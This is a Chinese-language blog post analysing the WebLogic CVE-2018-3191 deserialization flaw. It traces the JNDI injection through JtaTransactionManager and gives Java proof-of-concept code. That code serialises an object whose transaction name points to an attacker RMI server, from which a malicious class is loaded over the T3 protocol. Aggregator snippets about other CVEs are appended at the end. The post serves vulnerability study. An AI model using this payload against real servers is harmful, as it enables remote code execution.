2. 程式人生 > >weblogic之CVE-2018-3191漏洞分析

weblogic之CVE-2018-3191漏洞分析

阿新 發佈:2019-01-12

weblogic之CVE-2018-3191漏洞分析

理解這個漏洞首先需要看這篇文章:https://www.cnblogs.com/afanti/p/10193169.html
引用廖新喜說的,說白的就是反序列化時lookup中的引數可控,導致 JNDI注入

AbstractPlatformTransactionManager這個黑名單就是用於防止Spring JNDI注入,從官方以前的黑名單上就能看到org.springframework.transaction.support.AbstractPlatformTransactionManager,但是官方沒有想到在com.bea.core.repackaged的相關包還有spring的相關類。其實這兩個包中的類實現幾乎一樣,只是來源於不同的包。

看下利用過程:
生成poc.
Alt text
伺服器開啟jndi服務,ExportObject.java惡意類就是彈個計算器
Alt text
通過T3協議傳送資料包,伺服器向jndi請求惡意類,反序列化導致RCE:
Alt text
跟一下漏洞過程:
來到com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager類的initUserTransactionAndTransactionManager方法,this.userTransactionName屬性被賦值為惡意rmi地址,跟進164行:
Alt text
跟進lookup方法
Alt text
Alt text
最後看一下poc生成過程:
匯入所用到的com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar包和com.bea.core.repackaged.apache.commons.logging_1.2.1.jar包,將UserTransactionName引數注入惡意類地址。

        String test;
        System.out.println("hahha");

        test = "rmi://192.168.20.112:2222/aa";
        JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
        jtaTransactionManager.setUserTransactionName(test);
        File f = new File("E:\\Struts2-Vulenv-master\\ysoserial\\src\\main\\java\\ysoserial\\obj.txt");
        ObjectOutputStream out1 = new ObjectOutputStream(new FileOutputStream(f));
        out1.writeObject(jtaTransactionManager);
        out1.flush();
        out1.close();

Alt text

參考連結:
https://paper.tuisec.win/detail/a312d98e0285e24
https://github.com/pyn3rd/CVE-2018-3191
https://paper.seebug.org/718/

相關推薦

weblogicCVE-2018-3191漏洞分析

weblogic之CVE-2018-3191漏洞分析 理解這個漏洞首先需要看這篇文章:https://www.cnblogs.com/afanti/p/10193169.html 引用廖新喜說的,說白的就是反序列化時lookup中的引數可控,導致 JNDI注入 AbstractPlatformTra

【代碼審計】Spring Integration Zip不安全解壓(CVE-2018-1261)漏洞分析

圖片 ssa clas port als put gets 9.png after 1.漏洞相關信息 漏洞名稱:Spring Integration Zip不安全解壓 漏洞編號:CVE-2018-1261 漏洞描述:在spring-integration-zip.v1.0.

CVE-2018-8120 漏洞分析

CVE-2018-8120詳細分析漏洞描述 Microsoft Windows 7 SP1、Windows Server 2008 SP2和Windows Server 2008 R2 SP1都是美國微軟(Microsoft)公司的產品。Microsoft Windows 7 SP1是一套供個人電腦使用的操

cve-2018-0802漏洞分析報告

軟體名稱:公式編輯器 軟體版本:2016以下 漏洞模組:EQNEDT32.EXE 模組版本:6.1.95.45 編譯日期:2000-11-9 作業系統:Windows XP/2003/7/8.1/10 漏洞編號:cve-2017-0802 危害等級:高危 漏洞型別:緩衝區溢位 威脅型別:遠端

CVE-2018-18888漏洞分析

CVE-2018-18888漏洞分析 本漏洞發現於PHP開源框架laravelCMS 其中 \app\Http\Controllers\Backend目錄下的ProfileController.php檔案中關於檔案上傳的過濾與限制部分原始碼如下 if ((($_FILES[

漏洞分析CVE-2018-0802

漏洞分析之 CVE-2017-0802 目錄 漏洞分析之 CVE-2017-0802 目錄 ☛ 漏洞介紹 ☛ 漏洞分析 ☛ 1.漏洞分析環境與工具 ☛ 2.復現漏洞 ☛ 3.分析漏洞 ☛ 4.漏洞利用 完成時間:2018-10-24 21:26:54

weblogicCVE-2017-3248,CVE-2018-2628,CVE-2018-2893,CVE-2018-3245反序列繞過分析

關系 tail def nsa rem 獲取 cli ext 執行 說一下復現CVE-2017-3248可以參考p牛的環境,p牛的環境CVE-2018-2628實際就是CVE-2017-3248,他漏洞編號這塊寫錯了。 攻擊流程就如下圖,攻擊者開啟JRMPListener監

CVE-2018-4990 漏洞詳情分析

cve-2018-4990測試版本:AcroRdrDC1700920044_en_US 漏洞模塊: Escript.api 漏洞函數 修復函數 問題分析 拷貝對象的時候把DWORD類型的對象地址作為BYTE類型進行了拷貝,堆對象拷貝溢出漏洞。對象偏移在0x50的地方,也就是錯誤的位置。 Ja

CVE-2018-3191遠端程式碼命令執行漏洞

0x00 weblogic漏洞簡介 北京時間10月17日,Oracle官方釋出的10月關鍵補丁更新CPU(Critical Patch Update)中修復了一個高危的WebLogic遠端程式碼執行漏洞(CVE-2018-3191)。該漏洞允許未經身份驗證的攻擊者通過T3協議網路訪問並破壞易受攻

WebLogic反序列化漏洞CVE-2018-2628漏洞檢測與利用

Oracle官方釋出了4月份的關鍵補丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可導致遠端程式碼執行漏洞,漏洞威脅等級為高危,對應的CVE編號為CVE-2018-26 影響版本 Oracle WebLogic Se

[漏洞分析]對CVE-2018-0802的分析

對CVE-2018-0802的分析 漏洞簡介 這個漏洞依然出現在微軟工具Equation Editor中的EQNEDT32.exe可執行程式。 漏洞分析環境與工具 漏洞分析環境:Window 7專業版(32位) 帶有漏洞的軟體:office 2003 sp3 工具:OllyD

CVE-2018-18888漏洞挖掘分析

CVE-2018-18888漏洞分析 其中 \app\Http\Controllers\Backend目錄下的ProfileController.php檔案中關於檔案上傳的過濾與限制部分原始碼如下 if ((($_FILES["avatar"]["type"] ==

weblogicCVE-2016-0638反序列化分析

acf ext fun for 打印 collect 一個 需求 gic 此漏洞是基於CVE-2015-4852漏洞進行黑名單的繞過,CVE-2015-4852補丁主要應用在三個位置上 weblogic.rjvm.InboundMsgAbbrev.class :: Serv

weblogicCVE-2016-3510反序列化分析

ssg tps 生成 args pac 腳本 github ren aliyun 將反序列化的對象封裝進了weblogic.corba.utils.MarshalledObject,然後再對MarshalledObject進行序列化,生成payload字節碼。由於Mars

weblogiccve-2015-4852分析(重寫)

# 前言 有時間打算分析weblogic歷史漏洞,但是又要面試啥的,沒空。又剛好最近面試會問weblogic反序列化。具體啥時候分析weblogic反序列化,可能會在護網後,或者我開學了再分析。期間可能我會分析一下fastjson的吧。環境我都打包到附件中 # 0x01、環境搭建 不想動手去下載的,可以

CVE-2014-0195漏洞分析

auto ase dia sum messages handle cat lar specified Watching the industry respond to the Heartbleed vulnerability has been fascinating.

CVE-2017-8890漏洞分析和利用-概覽篇

本文永久連結:https://thinkycx.me/posts/2018-10-30-a-glance-at-CVE-2017-8890.html 最近在忙開題的事情,期間和同學聊了一下這個漏洞,想起來之前寫過一篇概覽的介紹,因此發出來給有需要的同學參考一下,後續可能還會再整理幾篇文章。這

Debian GNU/Linux 9 “Stretch”獲取新核心補丁,修復CVE-2018-15471和CVE-2018-18021漏洞

Debian專案釋出了一個新的Linux安全建議,以告知使用者Debian GNU/Linux 9 “Stretch”作業系統系列有關修復兩個漏洞的新核心安全補丁。 在Debian GNU/Linux 9 “Stretch”的最新主要核心安全更新發布一週後,新的Linux核心安全補丁就是為了解決Google

cve-2017-11882漏洞分析報告

軟體名稱:Office2016以下 軟體版本:2016以下 漏洞模組:EQNEDT32.EXE 模組版本:6.1.95.45 編譯日期:2000-11-9 作業系統:Windows XP/2003/7/8.1/10 漏洞編號:cve-2017-11882 危害等級:高危 漏洞型別:緩衝區溢位

CVE-2018-8174漏洞兩種姿勢的復現

CVE-2018-8174漏洞兩種姿勢的復現 CVE-2018-8174漏洞兩種姿勢的復現 漏洞介紹: 該漏洞影響最新版本的IE瀏覽器及使用了IE核心的應用程式。使用者在瀏覽網頁或開啟Office文件時都可能中招,最終被黑客植入後門木馬完全控制電腦。微軟在4月20日早上確認此漏洞,並於5